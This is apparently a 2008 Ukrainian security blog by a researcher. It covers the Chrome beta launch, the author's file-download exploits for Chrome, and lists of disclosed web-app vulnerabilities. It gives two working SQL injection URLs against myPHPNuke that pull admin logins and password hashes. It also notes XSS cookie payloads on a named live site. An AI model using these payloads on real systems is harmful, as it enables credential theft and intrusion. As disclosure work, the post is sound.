Websecurity - Веб безпека

Як я писав, учора вийшов Google Chrome. І викачавши сьогодні браузер для ознаймовлення з новим продуктом Гугла (до того ж найновішим браузером), я найперше звернув увагу на його безпеку.

І одразу виявив декілька уразливостей в Хромі. Про деякі з них я напишу найближчим часом, а зараз розповім про Automatic File Download уразливості в Google Chrome. Ще до того, як я викачав Хром, в ньому вже були виявлені дві уразливості й розроблені експлоіти для них (про які я детально напишу завтра).

Досліджуючи одну з даних уразливостей, що дозволяла автоматично завантажувати файли (що може бути використано для розповсюдження вірусів), я розробив нову версію експлоіта. Дана уразливість пов’язана з тегом iframe, в якому можна зіслатися на будь-який файл, в тому числі й exe. В моїй версії ескплоіта не потрібен JavaScript, тому він є більш універсальним.

Google Chrome Exploit-1 (original).html

Google Chrome Exploit-1.html

А також я виявив нову уразливість в Chrome, що дозволяє автоматично завантажувати файли - через тег frame.

Google Chrome Exploit-2.html

Уразлива версія Google Chrome 0.2.149.27.

Вчора офіціно вийшла бета версія Google Chrome - браузера від компанії Google. Тим самим Гугл долучився до браузерних війн разом з виробниками їнших браузерів, зокрема Microsoft, Mozilla, Apple та Opera.

З учорашнього дня викачати браузер могли лише мешканці деяких країн, а з сьогоднішнього дня їх число розширилося, в тому числі стало можливим викачання браузеру в Україні (з українських IP). Причому з україномовним інтерфейсом. Наявність локалізованих версій браузеру одразу для багатьох країн - це одна зі стратегій Гугла і це буде зручно як для користувачів, так і для поширення самого браузеру.

Про браузер ви можете дізнатися з коміксу Гугла про Google Chrome. А з сьогоднішнього дня окрім доступу до завантаження Гугл Хрому, також був розміщений опис функцій браузеру - Google Chrome - Функціональні можливості. До речі, в описі також наявні відео-ролики (котрі Гугл, як і текстовий опис функцій, зробив на українській мові), що буде зручно для тих, хто бажає наочно оцінити функціонал та інтерфейс браузеру. Але для повної оцінки його варто зкачати і випробувати власноруч.

Серед ключових особливостей свого додатку Гугл відзначає: Одне полу вводу, Сторінка “Нова вкладка”, Ярлики програм, Динамічні вкладки, Керування аварійним завершенням роботи, Режим анонімного перегляду, Безпечний перегляд, Миттєві закладки, Імпортування закладок та налаштування, Просте завантаження. Мене найбільше цікавить безпека браузеру - про що я напишу окремо .

Завантажити та ознайомитися з браузером ви можете на сайті Гугла. На даний момент доступна бета-версія Google Chrome під Windows (з часом очікуються версії під Mac OS X та Linux).

В даній добірці уразливості в веб додатках:

• bloofoxCMS 0.2.2 Remote File Include Vulnerabilitiy (деталі)
• Vulnerability in Maian Weblog v3.1 (деталі)
• Vulnerability in Flip-search-add-on 2.0 (деталі)
• Vulnerability in MySpeach v1.9 (деталі)
• Vulnerability in B2evolution 1.6 RFi (деталі)
• Vulnerability in Maian Gallery v1.0 (деталі)
• Vulnerability in Maian Search v1.1 (деталі)
• RFI vulnerability in phpMyChat-0.14.5 (деталі)
• SQL injection vulnerability in AlstraSoft Video Share Enterprise (деталі)
• Authentication bypass in AlstraSoft Video Share Enterprise (деталі)

Нещодавно, 24.08.2008, після знайдення попередньої, я знайшов нові SQL Injection уразливості в системі myPHPNuke. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

SQL Injection:

Уразливості в скрипті sections.php в параметрах artid та secid.

http://site/sections.php?op=viewarticle&artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1

http://site/sections.php?op=listarticles&secid=-1%20union%20select%20concat(aid,char(45),pwd)%20from%20mpn_authors%20limit%200,1

Уразливі версії до myPHPNuke 1.8.8_8rc2 (тому що в останній версії наявні додаткові фільтри). При цьому остання версія системи також уразлива - в ній можлива обмежена SQL Injection атака.

Нещодавно були виявлені численні уразливості в Invision Power Board та з’явився експлоіт для них. Причому експлоіт комплексний - одразу для багатьох уразливостей в IPB.

Уразливі версії: Invision Power Board 2.3.5 та попередні версії.

Окрім експлоіта, дослідники також опублікували детальну інформацію про знайдені уразливості в движку. Серед виявлених уразливостей Blind SQL Injection, Insecure SQL Password Usage, Admin Session Hijacking, Deep Recursion Protection Bypass, Code Execution, Redirector та Full path disclosure.

• [Advisory] Invision Power Board <= 2.3.5 Multiple Vulnerabilities and Security Bypass (деталі)
• [Exploit] Invision Power Board <= 2.3.5 Multiple Vulnerabilities (деталі)
• Invision Power Board <= 2.3.5 Multiple Vulnerabilities Exploit (revised) (деталі)

21.02.2007

Ще в вересні, 07.09.2006, я знайшов Cross-Site Scripting уразливості на секюріті (хакерському) проекті http://cydem.org.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

02.09.2008

XSS:

• alert(document.cookie) (уразливість вже не працює, тому що скрипт прибрали, як і увесь форум)
• alert(document.cookie)
• цікавий
• html включення

Дані уразливості досі повністю не виправлені.

В даній добірці експлоіти в веб додатках:

• AS-GasTracker 1.0.0 Insecure Cookie Handling Vulnerability (деталі)
• Feedback and Rating Script 1.0 (detail.php) SQL Injection Vulnerability (деталі)
• Freelance Auction Script 1.0 (browseproject.php) SQL Injection Vuln (деталі)
• Kostenloses Linkmanagementscript (page_to_include) RFI Vulnerability (деталі)
• 68 Classifieds 4.0 (category.php cat) SQL Injection Vulnerability (деталі)
• Newsmanager 2.0 (RFI/RFD/SQL/PB) Multiple Remote Vulnerabilities (деталі)
• Kostenloses Linkmanagementscript SQL Injection Vulnerabilities (деталі)
• Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (деталі)
• Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability (деталі)
• Web Slider <= 0.6 Insecure Cookie/Authentication Handling Vuln (деталі)